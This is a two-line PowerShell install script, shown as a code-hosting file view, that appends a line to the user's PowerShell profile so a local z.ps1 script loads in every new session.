2 lines
86 B
PowerShell
2 lines
86 B
PowerShell
$Filename = "$(Get-Location)\z.ps1"
|
|
"`n`n. `"$Filename`"" | Add-Content -Path $profile |